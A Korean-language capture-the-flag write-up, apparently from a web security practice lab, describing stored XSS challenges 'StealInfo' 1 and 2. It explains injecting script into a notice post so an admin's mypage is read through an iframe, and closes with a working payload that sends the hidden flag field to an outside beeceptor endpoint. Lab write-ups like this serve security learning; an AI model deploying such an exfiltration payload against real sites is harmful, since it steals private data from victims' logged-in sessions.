ClientScript

StealInfo 1번

notice 글을 읽을 때 xss 공격이 실행되는 것을  확인한 후 주요 정보가 있는 마이페이지에 iframe으로 접근해서  

innertext를 통해 마이페이지에 있는 글들이 출력되도록 한다. 

위의 캡처본을 보면 게시판 내용 부분에서 마이페이지가 출력되는 것을 알 수 있다. 

beeceptor로 요청이 보내지도록 설정해둔 결과 위와 같은 결과가 나온다. -> This is a very secret Info 라는 글자가 그대로 출력된다. 

관리자가 아니면 절대로 접근이 안되는 secret.php에 접근을 시도한다. 

관리자 권한으로 접근해야하기에 관리자 접근 사이트에서 해당 사이트의 url을 접속하면 beeceptor에서 request/response 값을 볼 수 있다.  

StealInfo 2번   

admin 계정에서 mypage에 들어가면 flag가 숨겨져있다고 해서 

먼저 admin / 1004 로 회원가입을 했다. 

그다음 admin으로 들어가면 이전 문제와 같은 곳에서 xss 공격이 실행된다. 

아래의 두 캡처본을 비교해보면 user가 admin일때 flag값이 추가로 들어가 있다.

마이페이지에 Nothing Here... 이 있기에 저 부분(주요정보)이 beeceptor로 전달되면 segfault flag 값을 얻을 수 있다.  

<iframe id="f" src="/scriptPrac2/mypage.php"></iframe>
<script>
const iframe = document.getElementById("f");
iframe.onload = () => {
  const data = iframe.contentDocument.getElementsByName('info')[0].getAttribute('placeholder')
  new Image().src =
    "https://entry.free.beeceptor.com?data=" +
    data;
};
</script>

위의 코드를 게시판 본문에 저장하면 아래와 같은 결과가 나온다.